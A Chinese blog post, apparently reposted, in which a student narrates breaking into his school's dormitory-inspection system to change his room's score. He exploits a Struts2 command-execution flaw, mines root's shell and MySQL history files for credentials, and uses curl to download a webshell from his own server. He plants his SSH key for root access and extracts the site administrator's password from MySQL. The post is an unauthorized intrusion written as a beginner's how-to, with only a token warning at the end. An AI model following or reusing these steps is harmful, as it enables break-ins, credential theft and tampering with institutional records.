起因：檢查宿舍的人扣我們寢室的的分了，學長告訴我有漏洞的， 那就燃起斗志搞下他??? 233333

目標網址：xxxxx.action
漏洞：struct2任意命令執行
不要說存在任意命令執行就感覺可以完成一切了，之前我也是這樣想的，實際情況告訴我，我想做的事情并做不了

利用過程：?? ?
首先是我已經可以執行命令了，但是我想獲取它mysql里邊存放的網站管理員的賬號密碼，因為我要改我的分嘛，只是命令是沒有用的

首先需要找到mysql的賬號密碼，然后登陸進去mysql

目標清楚了，然后開始操作，找mysql的賬號密碼

我的第一反應是直接在網站的配置文件中找mysql的賬號密碼，文件好多啊...
手工太麻煩了，就是著用grep -rn "root" 這樣的方法去減少我查找的范圍，雖然是少了一點，但是
還是感覺好麻煩...關鍵是找了好久都是亂七八糟的信息，有點躁...

大約半個月前就想著利用過，在 /root/下邊發現好多 .bash_history .mysql_history 的記錄文件，
就一個一個打開看的沒有發現有管理員的賬號密碼，也沒有我想要的信息
所以這次測試的時候基本沒想過看這幾個文件，想著和之前的文件應該是一樣的，事實證明這個想法是錯的
依舊是這個文件，我沒有找到系統管理員的賬號密碼，然而，我發現了mysql管理員的賬號和密碼

連接數據庫，我知道兩種方法，
一種是大馬上邊自帶的數據庫連接，第二種就是ssh鏈接進去,命令行連接
第一種方法：我的大馬需要有數據庫名稱，這就尷尬了，本來就不想去文件堆里邊找數據庫的信息了，直接放棄了...
第二種方法：因為不能使用echo 重定向等我知道的寫入文件的命令，然后我的服務器就派上用場了，對，使用curl
這里邊的curl是可以用的，但是后綴記得改掉，因為下載文件的時候.jsp/.php后綴文件，你只能下載下來html
curl xxxxxxxxx/dama.txt -o /xx/xx/dama.jsp 就ok了 ~~
大馬上去了就可以方便讀寫文件了，我試著直接在.ssh目錄下邊新建文件失敗，然后測試是否是大馬的上傳功能
不能使用，然后在/root/目錄下進行新建文件，成功！接著想到了，能不能在/root/目錄下創建好公匙文件，
然后移動到 .ssh 目錄？ 將目標服務器上邊的ssh的公匙復制下，然后將自己的公匙添加到人家的公匙下邊
我進行嘗試 ，創建成功！移動成功！

接著新手需要注意了，重啟sshd 服務才可以，大馬進行命令執行 service sshd restart
提示 ，重啟成功!
ssh root@xxx.xxx.xxx.xxx
連接成功！！！
之后嘗試進行mysql的登錄
mysql -uroot -p
登陸成功！！！
查詢數據庫的信息，成功找到網站管理員的賬號密碼！！！
到此，滲透加上獲取自己需要的信息完畢

可以向同學裝逼了 23333
警告！！！不要做壞事哦！！！

總結

以上是生活随笔為你收集整理的渗透学校某系统的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。